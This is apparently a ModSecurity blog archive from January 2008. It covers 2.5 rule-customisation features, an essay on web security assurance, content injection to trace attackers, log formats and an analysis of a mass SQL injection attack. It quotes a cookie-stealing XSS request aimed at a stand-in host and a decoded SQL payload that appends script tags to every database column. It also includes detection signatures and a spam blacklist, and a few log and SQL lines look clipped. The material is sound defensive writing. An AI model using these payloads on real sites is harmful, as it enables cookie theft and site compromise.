ModSecurity Blog: January 2008

ModSecurity 2.5 Status

The ModSecurity 2.5 release is scheduled for early-to-mid February.  With the release just around the bend, I have been spending my time doing a lot of testing, tweaking and polishing.  I would like ModSecurity 2.5 and the core rule set (or any of the commercial rule sets Breach offers) to be easier to integrate into your environment.  Ofer Shezaf and Avi Aminov are hard at work developing and tuning the core rule sets, and along with that work come requests for features to make integration and configuration easier.  Because of this, I have included a few new features in ModSecurity 2.5 to make things easier for rule set authors.  What this means is that it is time for the next release candidate, 2.5.0-rc2.  This release focuses primarily on making generic rule sets (such as the core rule set) easier to configure and customize for your sites.

Taming the Rule Set

ModSecurity does not give you much without a good rule set.  However, good rule sets are time consuming to develop and require a lot of testing and tuning.  More people benefit from a generic rule set, but these can be time consuming to customize for your sites while still allowing an easy upgrade path when new rule sets are released.  Those of you who follow the community mailing list have undoubtedly seen the many false positive reports and requests for help getting generic rules to fit a custom environment.  A generic rule set will not work for everyone out of the box and will need to be tailored to fit.  But tailoring can mean local modifications, and that may mean a lot of extra time spent retesting and reapplying those modifications when it comes time to upgrade the rule set.  Ryan Barnett has some excellent articles on how to modify a rule set in the least intrusive manner.  However, I want to introduce some new functionality I have added to ModSecurity 2.5 to help customize rule sets without actually touching the rules, making upgrades easier and less time consuming.

One of the biggest concerns over a generic third party rule set is that of policy.  To block or not to block, that is the question.  Some installers prefer just logging, others blocking via HTTP 403, some via HTTP 500, and others prefer dropping the connection altogether with a TCP reset.  In past versions of ModSecurity, this usually meant rule set authors had to include two versions of their rules, one for logging only and another for blocking.  If they did not, the installer had to manually change every action in the rule set that was not to their liking.  With ModSecurity 2.5, this blocking decision can now more easily be made by the rule set installer instead of the rule set author.

A new "block" action has been added to ModSecurity 2.5 to allow a rule set to specify where blocking is intended, but not actually specifying how to perform the blocking.  The how is left up to the rule set installer, including the choice of not blocking at all.  Currently this is done via inheritance (existing SecDefaultAction directive), but is also enhanced via the new SecRuleUpdateActionById directive.  Future versions of ModSecurity will make this even more flexible.

Take the following rule set as an example.  It will deny and log any request that is not a GET, POST or HEAD.  So, methods like PUT, TRACE, etc. will be denied with an HTTP 500 status even though the installer specified a default of "pass".

# Default set in the local config
SecDefaultAction "phase:2,pass,log,auditlog"

# In a 3rd party rule set
SecRule REQUEST_METHOD "!^(?:GET|POST|HEAD)$" "phase:1,t:none,deny,status:500"

With the new "block" action, this could be rewritten as in the following example.  In this example the blocking action is, well, not to block ("pass" specified in the SecDefaultAction).  This could easily be changed by the installer to "deny,status:501", "drop", "redirect:https://www.example.tld/", etc.  The important thing to note here is that the installer is making the choice, not the rule set author.

# Default set in the local config
SecDefaultAction "phase:2,pass,log,auditlog"

# In a 3rd party rule set
SecRule REQUEST_METHOD "!^(?:GET|POST|HEAD)$" "phase:1,t:none,block"

So now some of you are (or maybe should be) questioning how this new "block" action differs from simply not specifying a disruptive action in the rule and letting the inheritance work as designed.  At first glance there is not much difference.  The named action is a little cleaner to read, but there are really two main differences.  The first is that future versions of ModSecurity can expand on how you define and customize "block" in more detail.  The second lies in what "block" is doing: it explicitly reverts back to the default disruptive action, which leads into the next new feature.

Let me start off with another example (okay, it is the same example, but it is easy to follow).  Below, there is no way to change the disruptive action other than editing the third party rule in place or replacing the rule with a local copy.  The latter is better for maintenance, but it means keeping a local copy of the rule around which may require maintenance during a rule set upgrade.

# Default set in the local config
SecDefaultAction "phase:2,pass,log,auditlog"

# In a 3rd party rule set
SecRule REQUEST_METHOD "!^(?:GET|POST|HEAD)$" "id:1,phase:1,t:none,deny,status:500"

# Replace with a local copy of the rule
SecRuleRemoveById 1
SecRule REQUEST_METHOD "!^(?:GET|POST|HEAD)$" "id:1,phase:1,t:none,pass"

With ModSecurity 2.5, you can instead update the action to make the rule do something else.  This is done via the new SecRuleUpdateActionById directive.  It has the added benefit that if the third party rule set is upgraded later on (provided the rule id stays the same, which it should - hint), no editing of the customization is required.  In fact, there is no local copy of the rule to edit at all.

# Default set in the local config
SecDefaultAction "phase:2,pass,log,auditlog"

# In a 3rd party rule set
SecRule REQUEST_METHOD "!^(?:GET|POST|HEAD)$" "id:1,phase:1,t:none,deny,status:500"

# Update the default action explicitly
SecRuleUpdateActionById 1 "pass"

You should notice in the last example that what I did was change the third party rule back to what was originally specified in the SecDefaultAction.  If only there were a way to just tell the rule to use the default.  This is where the second reason for "block" comes into play (thought I forgot about that, eh?).  Instead of explicitly specifying the disruptive action, you can specify "block" and the rule will revert back to the last default action, which in this example is "pass".  The result is just as if the rule author had specified "block" instead of "deny".

# Default set in the local config
SecDefaultAction "phase:2,pass,log,auditlog"

# In a 3rd party rule set
SecRule REQUEST_METHOD "!^(?:GET|POST|HEAD)$" "id:1,phase:1,t:none,deny,status:500"

# Revert the rule back to the default disruptive action, "pass"
SecRuleUpdateActionById 1 "block"

The new SecRuleUpdateActionById directive is not limited to only disruptive actions.  You can update nearly any action.  The only imposed limit is that you may not change the ID of a rule.  However, some care should be taken for actions that are additive (transformations, ctl, setvar, etc.) as these actions are not replaced, but appended to.  For transformations, however, you can "replace" the entire transformation chain by specifying "t:none" as the first transformation in the update (just as you would when inheriting from SecDefaultAction).
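
To make that transformation behavior concrete, here is a sketch (the rule id and pattern below are made up for illustration):

# Hypothetical third party rule with a transformation
SecRule ARGS "attack-pattern" "id:10,phase:2,t:lowercase,block"

# Transformations are additive: updating with "t:trim" alone would
# leave the rule running t:lowercase,t:trim.  Leading with t:none
# replaces the entire chain, so the rule runs only t:trim.
SecRuleUpdateActionById 10 "t:none,t:trim"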

New Build Method and Automated Tests

Another big change in this release is the build process.  ModSecurity 2.5 is now built with a more automated method.  No more editing a Makefile.  Instead, a configure script was added to automate the creation of a Makefile by searching for the location of all dependencies.  Additionally, I added a number of automated tests to ensure operators and transformations are working as expected (executed via "make test").

# Typical build procedure is now:
make test
sudo make install

Other Notable Changes in this Release

There are a few other minor additions and changes in this second release candidate as well.

  • The mlogc tool is now included with the ModSecurity 2.5 source.
  • To help reduce assumptions, the default action is now a minimal "phase:2,log,pass" with no default transformations performed.
  • A new SecUploadFileMode directive is available to explicitly set the file permissions for uploaded files.  This allows easier integration with external analysis software (virus checkers, etc.).
  • To help reduce the risk of logging sensitive data, the query string is no longer logged in the error log.
  • Miscellaneous fixes for removing rules via SecRuleRemoveBy* directives.
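
As an illustration of the new upload directive, making intercepted uploads readable by an external virus scanner might look like the following sketch (the path and mode here are assumptions for your environment):

# Keep uploaded files and make them group-readable for a scanner
SecUploadDir /var/spool/modsecurity/uploads
SecUploadKeepFiles On
SecUploadFileMode 0640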

How You Can Help

As you can see there are a lot of new features and enhancements in ModSecurity 2.5.  I hope to see some good feedback from the release candidates so that we can get ModSecurity 2.5 polished up and the stable 2.5.0 available as soon as possible.  Installing and testing in your environment is a great help, but there are other ways you can help.

  • Read through and give suggestions for improvements to the documentation.
  • Run through the new build/install procedure and give suggestions on how it can be improved.
  • Tell us how you are using ModSecurity and where your biggest challenges are and where you might be hitting limitations.

Getting ModSecurity

As always, send questions/comments to the community support mailing list.  You can download the latest releases, view the documentation and subscribe to the mailing list on the ModSecurity web site.

Is Your Website Secure? Prove It.

The recent compromise and subsequent articles have created a perfect storm of discussion topics and concerns related to web security. The underlying theme is that true web security encompasses much more than a Nessus scan from an external company.

The concepts (and much of the text) in this post are taken directly from a blog post by Richard Bejtlich on his TaoSecurity site. I have simply tailored the concepts specifically to web security. Thanks to Richard for always posting thought provoking items and making me look at web security through a different set of eyes. You know what they say about imitation ;)

The title of this post forms the core of most of my recent thinking on web application security. Since I work for a commercial web application firewall company and am the ModSecurity Community Manager, I often get the chance to talk with people about web application security. While I am not a "sales" guy, I do hang out at our vendor booth when we are at conferences. I am mainly there to field technical questions and just interact with people. I have found that the title of this post is actually one of the absolute best questions to ask someone when they first come up to our booth. It always sparks interesting conversation and can shed light onto specific areas of strength and weakness.

What does it mean to be secure?

Obviously having logos posted on a web site that tout "we are secure" is really just a marketing tactic aimed at reassuring potential customers that it is safe to purchase goods at the site. The reality is that these logos are unreliable and make no guarantee as to the real level of security offered by the web site. At best, they are an indication that the web site has met some sort of minimum standard. But that is a far cry from actually being secure.

Let me expand "secure" to mean the definition Richard provided in his first book: Security is the process of maintaining an acceptable level of perceived risk. He defined risk as the probability of suffering harm or loss. You could expand my six-word question into: are you operating a process that maintains an acceptable level of perceived risk for your web application?

Let's review some of the answers you might hear to this question. I'll give an opinion regarding the utility of each answer as well. For the purpose of this exercise let's assume it is possible to answer "yes" to this question. In other words, we just don't answer "no." We could all make arguments as to why it's impossible to be secure, but does that really mean there is no acceptable level of perceived risk in which you could operate? I doubt it. Let's take a look at the various levels of responses.

So, is your website secure? Prove it.

1. Yes.

Then, crickets (i.e., silence, for you non-imaginative folks). This is completely unacceptable. The failure to provide any kind of proof is security by belief. We want security by fact. Think of it this way: would auditors accept this answer? Could you pass a PCI audit by simply responding "yeah, we are secure"? Nope, you need to provide evidence.

2. Yes, we have product X, Y, Z, etc. deployed.

This is better, but it's another expression of belief and not fact. The only fact here is that technologies can be abused, subverted, and broken. Technologies can be simultaneously effective against one attack model and completely worthless against another.

This also reminds me of another common response I hear and that is - yes, we are secure because we use SSL. Ugh... Let me share with you one personal experience that I had with an "SSL Secured" website. A while back, I decided to make an online purchase of some herbal packs that can be heated in the microwave and used to treat sore muscles. When I visited the manufacturer's web site, I was dutifully greeted with a message "We are a secure web site! We use 128-bit SSL Encryption." This was reassuring as I obviously did not want to send my credit card number to them in clear text. During my checkout process, I decided to verify some general SSL info about the connection. I double-clicked on the "lock" in the lower right-hand corner of my web browser and verified that the domain name associated with the SSL certificate matched the URL domain that I was visiting, that it was signed by a reputable Certificate Authority such as VeriSign, and, finally, that the certificate was still valid. Everything seemed in order so I proceeded with the checkout process and entered my credit card data. I hit the submit button and was then presented with a message that made my stomach tighten up. The message is displayed next; however, I have edited some of the information to obscure both the company and my credit card data.

The following email message was sent:
name: Ryan Barnett
address: 1234 Someplace Ct.
city: Someplace
state: State
zip: 12345
Type of card: American Express
name on card: Ryan Barnett
card number: 123456789012345
expiration date: 11/05
number of basics:
Number of eyepillows:
Number of neckrings: 1
number of belted: 1
number of jumbo packs:
number of foot warmers: 1
number of knee wraps:
number of wrist wraps:
number of keyboard packs:
number of shoulder wrap-s:
number of cool downz:
number of hats-black:         number of hats-gray:
number of hats-navy:         number of hats-red:
number of hats-rtcamo:         number of hats-orange:
do you want it shipped to a friend:
their address:
their city:
their state:
their zip:
cgiemail 1.6

I could not believe it. It looked as though they had sent out my credit card data in clear-text to an AOL email account. How could this be? They were obviously technically savvy enough to understand the need to use SSL encryption when clients submitted their data to their web site. How could they then not provide the same due diligence on the back-end of the process?

I was hoping that I was somehow mistaken. I saw a banner message at the end of the screen that indicated that the application used to process this order was called "cgiemail 1.6." I therefore hopped on Google and tried to track down the details of this application. I found a hit in Google that linked to the cgiemail webmaster guide. I quickly reviewed the contents and found what I was looking for in the "What security issues are there?" section:

Interception of network data sent from browser to server or vice versa via network eavesdropping. Eavesdroppers can operate from any point on the pathway between browser and server.

Risk: With cgiemail as with any form-to-mail program, eavesdroppers can also operate on any point on the pathway between the web server and the end reader of the mail. Since there is no encryption built into cgiemail, it is not recommended for confidential information such as credit card numbers.

Shoot, just as I suspected. I then spent the rest of the day contacting my credit card company about possible information disclosure and to place a watch on my account. I also contacted the company by sending an email to the same AOL address outlining the security issues that they needed to deal with. To summarize this story: Use of SSL does not a "secure site" make.

3. Yes, we are PCI compliant.

Generally speaking, regulatory compliance is usually a check-box paperwork exercise whose controls lag attack models of the day by one to five years, if not more. PCI is somewhat of an exception as it attempts to be more operationally relevant and address more current web application security issues. While there are some admirable aspects of PCI, please keep this mantra in mind -

It is much easier to pass a PCI audit if you are secure than to be secure because you pass a PCI audit.

PCI, like most other regulations, is a minimum standard of due care, and passing the audit does not make your site "unhackable." A compliant enterprise is like an ocean liner that feels secure because it left dry dock with life boats and jackets. If regulatory compliance is more than a paperwork self-survey, we approach the realm of real evidence. However, I have not seen any compliance assessments which measure anything of operational relevance. Check out Richard's blog posts on Control-Compliant security for more details on this concept and why it is inadequate. What we really need is more of a "Field-Assessed" mode of evaluation. I will discuss this concept more in depth in future blog posts.

4. Yes, we have logs indicating we prevented web attacks X, Y, and Z (SQL Injection, XSS, etc...).

This is getting close to the right answer, but it's still inadequate. For the first time we have some real evidence (logs) but these will probably not provide the whole picture. I believe that how people deploy and use a WAF is critical. Most people deploy a WAF in an "alert-centric" configuration which will only provide logs when a rule matches. Sure, these alert logs indicate what was identified and potentially stopped, but what about activities that were allowed? Were they all normal, or were some malicious but unrecognized by the preventative mechanism? Deploying a WAF as an HTTP level auditing device is a highly under-utilized deployment option. There is a great old quote that sums up this concept -

"In an incident, if you don't have good logs (i.e. auditing), you'd better have good luck."
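
For example, an audit-centric (rather than alert-centric) ModSecurity deployment might record every transaction instead of only rule matches. The following is a sketch; the log path is illustrative:

# Log all transactions, not only those that matched a rule
SecAuditEngine On
SecAuditLogType Serial
SecAuditLog /var/log/apache2/modsec_audit.log
SecAuditLogParts ABIFHZ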

5. Yes, we do not have any indications that our web applications are acting outside their expected usage patterns.

Some would call this rationale the definition of security. Whether or not this answer is acceptable depends on the nature of the indications. If you have no indications because you are not monitoring anything, then this excuse is hollow. If you have no indications and you comprehensively track the state of a web application, then we are making real progress. That leads to the penultimate answer, which is very close to ideal.

6. Yes, we do not have any indications that our web applications are acting outside their expected usage patterns, and we thoroughly collect, analyze, and escalate a variety of network-, host-, and web application-based evidence for signs of violations.

This is really close to the correct answer. The absence of indications of intrusion is only significant if you have some assurance that you've properly instrumented and understood the web application. You must have trustworthy monitoring systems in order to trust that a web application is "secure." The lack of robust audit logs is usually the reason why organizations cannot provide this answer. Put it this way: Common Log Format (CLF) logs are not adequate for full web-based incident response. Too much data is missing. If this is really close, why isn't it correct?

7. Yes, we do not have any indications that our web applications are acting outside their expected usage patterns, and we thoroughly collect, analyze, and escalate a variety of network-, host-, and web application-based evidence for signs of violations. We regularly test our detection and response people, processes, and tools against external adversary simulations that match or exceed the capabilities and intentions of the parties attacking our enterprise (i.e., the threat).

Here you see the reason why number 6 was insufficient. If you assumed that number 6 was OK, you forgot to ensure that your operations were up to the task of detecting and responding to intrusions. Periodically you must benchmark your perceived effectiveness against a neutral third party in an operational exercise (a "red team" event). A final assumption inherent in all seven answers is that you know the assets you are trying to secure, which is no mean feat. Think of this practical exercise: if you run a zero-knowledge (meaning unannounced to operations staff) web application penetration test, how does your organization respond? Do they even notice the penetration attempts? Do they report it through the proper escalation procedures? How long does it take before additional preventative measures are employed? Without answers to this type of "live" simulation, you will never truly know if your monitoring and defensive mechanisms are working.


Indirectly, this post also explains why doing only one of the following: web vulnerability scanning, penetration testing, deploying a web application firewall, or log analysis does not adequately ensure "security." While each of these tasks excels in some areas and aids in the overall security of a website, each is also ineffective in other areas. It is the overall coordination of these efforts that will provide organizations with, as Richard would say, a truly "defensible web application."

Content Injection Use Case Example

ModSecurity 2.5 introduces a really cool, yet somewhat obscure feature called Content Injection. The concept is pretty interesting as it allows you to inject any text data that you want into the response bodies of your web application.
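
A minimal sketch of the idea, modeled on the examples later in this post (the injected comment text is a harmless placeholder): enable injection globally, then prepend a fragment to HTML responses.

# Content injection must be enabled for prepend/append to work
SecContentInjection On

# Prepend a text fragment to every HTML response body
SecRule RESPONSE_CONTENT_TYPE "^text/html" "phase:3,nolog,pass,prepend:'<!-- injected by ModSecurity -->'"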

Identifying Real IP Addresses of Web Attackers

One of the biggest challenges of doing incident response during web attacks is trying to trace the source IP address information back to the "real" attacker's computer. The reason this is so challenging is that attackers almost always loop their attacks through numerous open proxy servers or other compromised hosts where they set up connection tunnels. This means that the IP address that shows up in the victim's logs is most likely only the last hop between the attacker and the target site. One way to tackle this problem is, instead of relying on the TCP/IP address information of the connection, to attempt to handle it at the HTTP layer.

Web security researchers (such as Jeremiah Grossman) have conducted quite a bit of research into how blackhats can send malicious javascript/java to clients. Once the code executes, it can obtain the client's real (internal NAT) IP address. With this information, the javascript code can do all sorts of interesting stuff such as port scan the internal network. In our scenario, the client is not an innocent victim but instead a malicious client who is attacking our site. The idea is that the code we send to the client will execute locally, grab their real IP address and then post the data back to a URL location on our site. With this data, we can then perhaps initiate a brand new incident response engagement focusing in on the actual origin of the attacks!

The following rule uses the same data as the previous example, except this time, instead of simply sending an alert pop-up box we are sending the MyAddress.class java applet. This code will force the attacker's browser to initiate a connection back to our web server.

SecRule TX:ALERT "@eq 1" "phase:3,nolog,pass,chain,prepend:'<APPLET CODE=\"MyAddress.class\" MAYSCRIPT WIDTH=0 HEIGHT=0><PARAM NAME=\"URL\" VALUE=\"grab_ip.php?IP=\"></APPLET>'"
SecRule RESPONSE_CONTENT_TYPE "^text/html"

So, if an attacker sends a malicious request that ModSecurity triggers on, this rule will then fire and it will send the injected code to the client. Our Apache access_logs will show data similar to this:

- - [20/Jan/2008:21:15:03 -0500] "GET /cgi-bin/foo.cgi?param=<script>document.write('<img%20src="https://hackersite/'+document.cookie+'"')</script> HTTP/1.1" 500 676
- - [20/Jan/2008:21:15:03 -0500] "GET /cgi-bin/grab_ip.php?IP= HTTP/1.1" 404 207

As you can see, even though the IP address recorded in the access_logs is only that of the last proxy hop, the data returned in the QUERY_STRING portion of the second request line reveals the real IP address of the attacker. In this case, the attacker's system was not on a private network (perhaps the computer was connected directly to the internet), so you would be able to obtain the actual IP of an attacker who was conducting a manual attack with a browser.

Attacker -> Proxy -> ... -> Proxy -> Target Website
(real IP)                  (IP recorded in the logs)

This example is extremely experimental. As the previous section indicates, if the attacker were behind a router (on a private LAN), the address captured would most likely have been from a private RFC 1918 range (such as

Attacker -> Firewall/Router -> ... -> Proxy -> Target Website
(internal LAN address)                (IP recorded in the logs)

This type of data would not be as useful for our purposes as it wouldn't help for a traceback.

Non-Browser Clients

Since a majority of web attacks are automated, odds are that the application that is sending the exploit payload is not actually a browser but rather some sort of scripting client. This would mean that the javascript/java code would not actually execute.


Hopefully you can now see the potential power of the content injection capability in ModSecurity. The goal of this post was to get you thinking about the possibilities. For other ideas on the interesting types of javascript that we could inject, check out PDP's AttackAPI Atom database. ModSecurity will eventually expand this functionality to allow for injecting content at specific locations of a response body instead of just at the beginning or at the end.

Yes, the Tide for Web Application Firewalls is Turning

Some time ago I decided to start a new blog, a place where I would be able to address topics that are not ModSecurity specific. I felt the ModSecurity Blog has its purpose and a happy audience; I didn't want it to lose its focus. Today I made my first proper post at the new blog:

There is a long-running tradition in the web application firewall space; every year we say: "This year is going to be the one when web application firewalls take off!" So far, every year turned out to be a bit of a disappointment in this respect. This year feels different, and I am not saying this because it's a tradition to do so. Recent months have seen a steady and significant rise in the interest in and the recognition of web application firewalls. But why is it taking so long?

To read more please continue to "Tide is turning for web application firewalls".

ModSecurity Data Formats

I have just added a new section to the ModSecurity v2.5 Reference Manual, describing the data formats we use. Nothing spectacular, I know, but it is always nice when things get written down.


Below is an example of a ModSecurity alert entry. It is always contained on a single line but we've broken it here into multiple lines for readability.

Access denied with code 505 (phase 1). Match of "rx ^HTTP/(0\\\\.9|1\\\\.[01])$"
against "REQUEST_PROTOCOL" required. [id "960034"] [msg "HTTP protocol version
is not allowed by policy"] [severity "CRITICAL"] [uri "/"] [unique_id

Each alert entry begins with the engine message:

Access denied with code 505 (phase 1). Match of "rx ^HTTP/(0\\\\.9|1\\\\.[01])$"
against "REQUEST_PROTOCOL" required.

The engine message consists of two parts. The first part tells you whether ModSecurity acted to interrupt transaction or rule processing. If it did nothing the first part of the message will simply say "Warning". If an action was taken then one of the following messages will be used:

  • Access denied with code %0 - a response with status code %0 was sent.
  • Access denied with connection close - connection was abruptly closed.
  • Access denied with redirection to %0 using status %1 - a redirection to URI %0 was issued using status %1.
  • Access allowed - rule engine stopped processing rules (transaction was unaffected).
  • Access to phase allowed - rule engine stopped processing rules in the current phase only. Subsequent phases will be processed normally. Transaction was not affected by this rule but it may be affected by any of the rules in the subsequent phase.
  • Access to request allowed - rule engine stopped processing rules in the current phase. Phases prior to request execution in the backend (currently phases 1 and 2) will not be processed. The response phases (currently phases 3 and 4) and others (currently phase 5) will be processed as normal. Transaction was not affected by this rule but it may be affected by any of the rules in the subsequent phase.

The second part of the engine message explains why the event was generated. Since it is automatically generated from the rules it will be very technical in nature talking about operators and their parameters and give you insight into what the rule looked like. But this message cannot give you insight into the reasoning behind the rule. A well-written rule will always specify a human-readable message (using the msg action) to provide further clarification.

The metadata fields are always placed at the end of the alert entry.  Each metadata field is a text fragment that consists of an open bracket followed by the metadata field name, followed by the value and the closing bracket.  What follows is the text fragment that makes up the id metadata field.

[id "960034"]

The following metadata fields are currently used:

  1. id - Unique rule ID, as specified by the id action.
  2. rev - Rule revision, as specified by the rev action.
  3. msg - Human-readable message, as specified by the msg action.
  4. severity - Event severity, as specified by the severity action.
  5. unique_id - Unique event ID, generated automatically.
  6. uri - Request URI.
  7. logdata - Transaction data fragment, as specified by the logdata action.

Alerts in Apache

Every ModSecurity alert conforms to the following format when it appears in the Apache error log:

[Sun Jun 24 10:19:58 2007] [error] [client] ModSecurity: ALERT_MESSAGE

The above is a standard Apache error log format. The "ModSecurity:" prefix is specific to ModSecurity. It is used to allow quick identification of ModSecurity alert messages when they appear in the same file next to other Apache messages.

The actual message (ALERT_MESSAGE in the example above) is in the same format as described in the Alerts section.

Alerts in Audit Log

Alerts are transported in the H section of the ModSecurity Audit Log. Alerts will appear each on a separate line and in the order they were generated by ModSecurity. Each line will be in the following format:


Below is an example of an entire H section (followed by the Z section terminator):

Message: Warning. Match of "rx ^apache.*perl" against "REQUEST_HEADERS:User-Agent" required. [id "990011"]
 [msg "Request Indicates an automated program explored the site"] [severity "NOTICE"]
Message: Warning. Pattern match "(?:\\b(?:(?:s(?:elect\\b(?:.{1,100}?\\b(?:(?:length|count|top)\\b.{1,100}
 (?:(?:addextendedpro|sqlexe)c|(?:oacreat|prepar)e|execute(?:sql)?|makewebt ..." at ARGS:c. [id "950001"]
 [msg "SQL Injection Attack. Matched signature: union select"] [severity "CRITICAL"]
Stopwatch: 1199881676978327 2514 (396 2224 -)
Producer: ModSecurity v2.x.x (Apache 2.x)
Server: Apache/2.x.x

Audit Log

ModSecurity records one transaction in a single audit log file. Below is an example:

[09/Jan/2008:12:27:56 +0000] OSD4l1BEUOkAAHZ8Y3QAAAAH 64995 80
GET //EvilBoard_0.1a/index.php?c='/**/union/**/select/**/1,concat(username,char(77),
TE: deflate,gzip;q=0.3
Connection: TE, close
User-Agent: libwww-perl/5.808
HTTP/1.1 404 Not Found
Content-Length: 223
Connection: close
Content-Type: text/html; charset=iso-8859-1
Message: Warning. Match of "rx ^apache.*perl" against "REQUEST_HEADERS:User-Agent" required. [id "990011"]
 [msg "Request Indicates an automated program explored the site"] [severity "NOTICE"]
Message: Warning. Pattern match "(?:\\b(?:(?:s(?:elect\\b(?:.{1,100}?\\b(?:(?:length|count|top)\\b.{1,100}
 (?:(?:addextendedpro|sqlexe)c|(?:oacreat|prepar)e|execute(?:sql)?|makewebt ..." at ARGS:c. [id "950001"]
 [msg "SQL Injection Attack. Matched signature: union select"] [severity "CRITICAL"]
Apache-Error: [file "/tmp/buildd/apache2-2.x.x/build-tree/apache2/server/core.c"] [line 3505] [level 3]
 File does not exist: /var/www/EvilBoard_0.1a
Stopwatch: 1199881676978327 2514 (396 2224 -)
Producer: ModSecurity v2.x.x (Apache 2.x)
Server: Apache/2.x.x

The file consists of multiple sections, each in a different format. Separators are used to define the sections.


A separator always begins on a new line and conforms to the following format:

  1. Two dashes at the beginning.
  2. Unique boundary, which consists of several hexadecimal characters.
  3. One dash character.
  4. Section identifier, currently a single uppercase letter.
  5. Two trailing dashes at the end.
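
These five rules translate directly into a regular expression. The following Python sketch validates and decomposes a separator line (the boundary value in the example is illustrative, not taken from a real log):

```python
import re

# Two leading dashes, a hexadecimal boundary, one dash, a single
# uppercase section letter, and two trailing dashes.
SEPARATOR = re.compile(r'^--([0-9a-fA-F]+)-([A-Z])--$')

def parse_separator(line):
    """Return (boundary, section) for a separator line, else None."""
    match = SEPARATOR.match(line.strip())
    return match.groups() if match else None

# parse_separator("--c7036611-H--") returns ("c7036611", "H")
```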

Refer to the documentation for SecAuditLogParts for the explanation of each part.

Speaking About ModSecurity at ApacheCon Europe 2008

I will be speaking about ModSecurity at ApacheCon Europe in Amsterdam later this year. I hear ApacheCon Europe 2007 (also in Amsterdam) was great so I am looking forward to participating this year. Interestingly, for some reason or another, this will be the first time ModSecurity will be "officially" presented to the Apache crowd, in spite of the fact we've been going at it for years. As always, the best part is meeting the people you've been communicating with for years.

"Intrusion detection is a well-known network security technique -- it introduces monitoring and correlation devices to networks, enabling administrators to monitor events and detect attacks and anomalies in real-time. Web intrusion detection does the same but it works on the HTTP level, making it suitable to deal with security issues in web applications. This session will start with an overview of web intrusion detection and web application firewalls, discussing where they belong in the overall protection strategy. The second part of the talk will discuss ModSecurity and its capabilities. ModSecurity is an open source web application firewall that can be deployed either embedded (in the Apache HTTP server) or as a network gateway (as part of a reverse proxy deployment). Now in its fifth year of development, ModSecurity is mature, robust and flexible. Due to its popularity and wide usage it is now positioned as a de-facto standard in the web intrusion detection space."

SQL Injection Attack Infects Thousands of Websites

Here is a snippet from the just released SANS NewsBites letter:

"TOP OF THE NEWS --SQL Injection Attack Infects Thousands of Websites (January 7 & 8, 2008) At least 70,000 websites have fallen prey to an automated SQL injection attack that exploits several vulnerabilities, including the Microsoft Data Access Components (MDAC) flaw that Microsoft patched in April 2006. Users have been redirected to another domain [u c 8 0 1 0 . c o m], that attempted to infect users' computers with keystroke loggers. Many of the sites have since been scrubbed. The attack is similar to one launched last year against the Miami Dolphins' Stadium website just prior to the Super Bowl."

Additional coverage is available from several news outlets.

So, there is a new, nasty bot on the loose that is targeting websites that use IIS with a MS-SQL database. It exploits generic SQL injection vulnerabilities in those websites to inject malicious JavaScript into all fields. Once it gets victims to the web site, it tries to exploit various known browser and plugin vulnerabilities. Essentially, the attack inserts <script src=https://?></script> into all varchar and text fields in your SQL database.

While there has been much focus on the goal of the attack -- which is to try and exploit some browser (client) vulnerabilities to perhaps install some trojans or other malware -- not as much attention has been paid to the actual attack vector that led to the compromise: the SQL injection attack itself.

Here is an example IIS log entry of the SQL Injection attack that was posted to a user forum:

2007-12-30 18:22:46 POST /crappyoutsourcedCMS.asp;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST
C00400043002000'. - HTTP/1.0 Mozilla/3.0+(compatible;+Indy+Library)
- 500 15248

If you decode the CAST values, here is the actual SQL that is being injected:

DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select, 
from sysobjects a,syscolumns b where and a.xtype='u' and (b.xtype=99 or b.xtype=35
or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+'
]))+''<script src=></script>''')FETCH NEXT FROM 
Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor DECLARE @T

Mitigation Options

There are many remediation steps that can and should be taken.

Immediate Fix: Use ModSecurity and the Core Rules

If these web sites were front-ended by an Apache reverse proxy server (with ModSecurity and the Core Rules), then the back-end IIS/MS-SQL application servers would have been protected against this attack. The free Core Rules, which are available for download from the ModSecurity web site, include SQL injection rules that would have identified and blocked this specific automated attack. Specifically, Rule ID 950001 in the modsecurity_crs_40_generic_attacks.conf file would have triggered on the "cast(" portion of the SQL injection string.

Mid-Term/Long-Term Fix: Correct the Code

Web developers should identify and correct any Input Validation errors in their code, and make sure the SQL queries are sent to the database in a safe manner (which typically translates to using binding to pass parameters).
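
To illustrate what "using binding to pass parameters" means in practice, here is a sketch using Python and the standard library's sqlite3 module as a stand-in (the affected sites run MS-SQL, and the table and column names here are made up for the example); the same principle applies to any database API:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, comment TEXT)")

user_input = "'; update users set comment='<script src=...></script>' --"

# Vulnerable: interpolating user input straight into the SQL string
# is exactly what allowed the automated attack described above.
# query = "INSERT INTO users VALUES ('%s', 'hi')" % user_input

# Safe: the driver passes the value as a bound parameter, so it can
# never be interpreted as SQL, no matter what characters it contains.
conn.execute("INSERT INTO users (username, comment) VALUES (?, ?)",
             (user_input, "hi"))

row = conn.execute("SELECT username FROM users").fetchone()
# row[0] is the attack string, stored verbatim as harmless data
```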

Set-based Pattern Matching Example

Large Wordlist Example

You will find the greatest benefit of the set-based matching operators when you need to look for an extremely large word list in the variable data. A perfect example is searching request content for the presence of SPAM keywords or references to known SPAM hosting locations. The GotRoot rule set includes a rule file called blacklist.conf that contains rules similar to the following, approximately 7,600 individual rules in all:

SecRule HTTP_Referer|ARGS "best-deals-blackjack\.info"
SecRule HTTP_Referer|ARGS "best-deals-casino\.info"
SecRule HTTP_Referer|ARGS "best-deals-cheap-airline-tickets\.info"
SecRule HTTP_Referer|ARGS "best-deals-diet\.info"
SecRule HTTP_Referer|ARGS "best-deals-flowers\.info"
SecRule HTTP_Referer|ARGS "best-deals-hotels\.info"
SecRule HTTP_Referer|ARGS "best-deals-online-gambling\.info"
SecRule HTTP_Referer|ARGS "best-deals-online-poker\.info"
SecRule HTTP_Referer|ARGS "best-deals-poker\.info"
SecRule HTTP_Referer|ARGS "best-deals-roulette\.info"
SecRule HTTP_Referer|ARGS "best-deals-weight-loss\.info"
SecRule HTTP_Referer|ARGS "bestdims\.com"
SecRule HTTP_Referer|ARGS "bestdvdclubs\.com"
SecRule HTTP_Referer|ARGS "best-e-site\.com"
SecRule HTTP_Referer|ARGS "best-gambling\.biz"
